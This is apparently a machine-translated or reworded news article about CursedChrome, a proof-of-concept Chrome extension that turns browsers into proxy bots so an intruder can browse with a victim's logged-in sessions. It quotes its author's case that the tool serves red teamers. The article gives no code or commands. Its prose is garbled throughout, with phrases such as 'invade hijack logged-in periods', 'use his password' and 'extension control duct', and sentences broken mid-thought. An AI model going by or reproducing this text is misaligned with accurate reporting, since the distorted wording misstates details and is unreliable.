Last week, a security researcher published a proof-of-concept Chrome extension with proof of the concept that turns Chrome browsers into proxy bots, allowing hackers to navigate the web using the identity of an infected user. The tool, called CursedChrome, was created by security researcher Matthew Bryant and released on GitHub as an open source project.
Now, CursedChrome has two different parts - one component on the client side (the Chrome extension itself) and one on the server side (a control panel that lists all CursedChrome bots).
Once the extension has been installed on some browsers, the intruder can connect to the CursedChrome control panel and create connection on any infected central computer.
The link between the extension and the control panel is a simple WebSocket connection that works as a classic reverse proxy HTTP.
This means that when the intruder connects to an infected central computer, they can then navigate the web using the infected person. Browser and, in doing so, invade hijack logged-in periods and online identities to access prohibited areas, such as intranets or corporate applications.
A project like CursedChrome is the perfect tool for an intruder.
CURSEDCHROME was created as a tool for pen-testers
However, in an interview last week, Bryant said he was not in his intentions.
"One opens the source code because I want other professional red teamers and pen-testers to be able to accurately simulate the malicious browser extension scenario," Bryant told us.
With the term red teamers, the researcher refers to cybersecurity professionals who are paid to enter Companies. Their work is vital as they report what they find, so companies can fix issues and keep hackers away.
The researcher also said that CursedChrome is nothing that an intruder could not have built himself. The project works on existing ones technologies and does not bring any innovation to the table.
"Tools like Cobalt Strike 'browser pivot' (for Internet Explorer) and the BeEF open source framework have been around for years and the technical details of how to do this attack available for free at InternetSaid Bryant.
In addition, Bryant is not afraid that hackers may use his password. Weaponizing CursedChrome requires attackers to either (1) host the extension in the Chrome Web Store or (2) install it through a corporate policy or through the Chrome Developer feature.
Bryant says the first scenario is unlikely to work as "the Web Store extension control duct is extremely effective in maintaining potentially malicious extensions," while the second scenario requires an attacker to access network of a company, from which they already have full control and access to anything else.
Instead, the researcher said he wants to raise awareness about the issue of malicious Chrome extensions and the damage they can do to corporate environments.
The researcher says that using something like CursedChrome, pen-testers can show companies how vulnerable they really are when they don't strictly control what they can install. Employees in their browsers.